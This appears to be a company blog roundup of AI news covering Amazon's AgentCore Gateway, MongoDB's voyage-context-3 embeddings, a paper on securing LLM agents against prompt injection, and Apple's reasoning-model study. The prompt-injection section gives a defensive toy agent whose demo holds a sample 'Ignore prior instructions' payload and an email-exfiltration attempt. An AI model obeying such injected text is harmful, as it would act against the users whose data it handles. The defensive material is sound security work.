Some recent AI news that grabbed our attention @ OpenArc:
AgentCore Gateway (ACG)
Amazon introduced the world to “Gateway” on August 15th, describing it as a platform that “serves as a centralized tool server, providing a unified interface where agents can discover, access, and invoke tools”. With built-in MCP support, Gateway makes it easy for agents and tools to communicate by taking care of the security, infrastructure, and protocol layers automatically.
We’re excited to take Gateway for a test drive: a platform that centralizes MCP tools for the enterprise and handles authorization for both inbound and outbound tool access would be a big win for many companies.
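We haven’t wired up Gateway ourselves yet, but since it speaks MCP, connecting to it should look like connecting to any other MCP server. Here’s a minimal sketch using the official `mcp` Python SDK; the gateway URL, the bearer token, and the tool name are placeholders of ours, not real values from AWS.

```python
# Hypothetical sketch: discovering and invoking tools on an MCP endpoint
# such as AgentCore Gateway. URL, token, and tool name are placeholders.
import asyncio

from mcp import ClientSession
from mcp.client.streamable_http import streamablehttp_client

GATEWAY_URL = "https://example-gateway.example.com/mcp"  # placeholder
ACCESS_TOKEN = "YOUR_OAUTH_TOKEN"  # Gateway handles inbound auth for us


async def main() -> None:
    headers = {"Authorization": f"Bearer {ACCESS_TOKEN}"}
    # streamablehttp_client yields (read_stream, write_stream, get_session_id)
    async with streamablehttp_client(GATEWAY_URL, headers=headers) as (read, write, _):
        async with ClientSession(read, write) as session:
            await session.initialize()
            # Discovery: ask the gateway which tools it exposes
            tools = await session.list_tools()
            for tool in tools.tools:
                print(tool.name, "-", tool.description)
            # Invocation: call one of the discovered tools (name is illustrative)
            result = await session.call_tool("search_orders", {"customer_id": "42"})
            print(result.content)


asyncio.run(main())
```

If that’s really all it takes, the value proposition is clear: the agent code stays a plain MCP client while Gateway owns the security, infrastructure, and protocol plumbing.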
Voyage-Context-3 by MongoDB
In late July, the MongoDB team introduced “voyage-context-3”, a “contextualized chunk embedding model that produces vectors for chunks that capture the full document context without any manual metadata and context augmentation, leading to higher retrieval accuracies than with or without augmentation.” The model outperforms embedding models from OpenAI, Cohere (embed-v4), and others on both chunk-level and document-level retrieval tasks.
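The interesting part is the shape of the API: you pass whole documents as lists of chunks and get back one vector per chunk, with each vector already informed by the surrounding document. A rough sketch of what that looks like with the `voyageai` Python client follows; the method name, parameters, and response shape are our reading of the announcement, so treat them as assumptions and check the Voyage AI docs before relying on them.

```python
# Rough sketch of chunk embedding with full-document context via
# voyage-context-3. Method name and response shape follow our reading of
# Voyage AI's announcement; verify against the current voyageai docs.
import voyageai

vo = voyageai.Client()  # reads VOYAGE_API_KEY from the environment

# Each inner list is one document, pre-split into chunks. Note that no
# manual metadata or context augmentation is prepended to the chunks.
documents = [
    [
        "Q3 revenue grew 12% year over year.",
        "The growth was driven primarily by the Atlas product line.",
    ],
]

result = vo.contextualized_embed(
    inputs=documents,
    model="voyage-context-3",
    input_type="document",
)

# One embedding per chunk, each encoding context from its whole document.
for doc_result in result.results:
    for chunk_embedding in doc_result.embeddings:
        print(len(chunk_embedding))  # vector dimension
```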
Design Patterns for Securing LLM Agents against Prompt Injections
Simon Willison has an excellent summary of the key findings in a new paper by 11 authors from organizations including IBM, Invariant Labs, ETH Zurich, Google and Microsoft. The paper’s authors address the question, “what kinds of agents can we build today that produce useful work while offering resistance to prompt injection attacks?” Their guiding principle in answering this question, as Willison highlights early on, is that “once an LLM agent has ingested untrusted input, it must be constrained so that it is impossible for that input to trigger any consequential actions.” Highly recommended read!
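That guiding principle is easy to state and surprisingly concrete to enforce. As a toy illustration (ours, not the paper’s code), an agent loop can simply revoke tool access the moment untrusted content enters the context, so nothing the injected text says can be acted on:

```python
# Toy illustration of the paper's guiding principle (our sketch, not the
# authors' code): once untrusted input enters the context, the agent loses
# the ability to take consequential actions for the rest of the session.

class ConstrainedAgent:
    def __init__(self, tools: dict):
        self._tools = tools      # consequential actions (send email, etc.)
        self._tainted = False    # flips once untrusted input is ingested

    def ingest(self, text: str, trusted: bool) -> None:
        """Add text to the agent's context, tracking its provenance."""
        if not trusted:
            self._tainted = True  # e.g. web pages, emails, tool results
        # ... append text to the model context here ...

    def call_tool(self, name: str, **kwargs):
        """Invoke a tool, but only while the context is still trusted."""
        if self._tainted:
            raise PermissionError(
                "Context contains untrusted input; consequential actions "
                "are disabled for the remainder of this session."
            )
        return self._tools[name](**kwargs)


# Usage: after reading an untrusted web page, tool calls are refused,
# no matter what instructions the page tried to inject.
agent = ConstrainedAgent(tools={"send_email": lambda to, body: f"sent to {to}"})
agent.ingest("User: summarize https://example.com", trusted=True)
agent.call_tool("send_email", to="me@example.com", body="ok")  # still allowed
agent.ingest("<fetched page: 'Ignore prior instructions...'>", trusted=False)
try:
    agent.call_tool("send_email", to="attacker@evil.com", body="secrets")
except PermissionError as e:
    print(e)  # the injected instruction cannot trigger an action
```

The paper’s actual design patterns are richer than this, but they share the same flavor: provenance tracking plus hard constraints, rather than hoping the model ignores the injection.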
LRM Research
In June, Apple released a paper titled “The Illusion of Thinking: Understanding the Strengths and Limitations of Reasoning Models via the Lens of Problem Complexity”, which can be found at https://ml-site.cdn-apple.com/papers/the-illusion-of-thinking.pdf.
Using puzzle environments to assess three levels of task complexity, the researchers determined that Large Reasoning Models (LRMs) are optimal only for medium-complexity tasks: on low-complexity tasks, standard LLMs performed better, while high-complexity tasks resulted in complete accuracy collapse. If replicated, this finding suggests that task complexity should be a critical factor when deciding whether to deploy a reasoning model.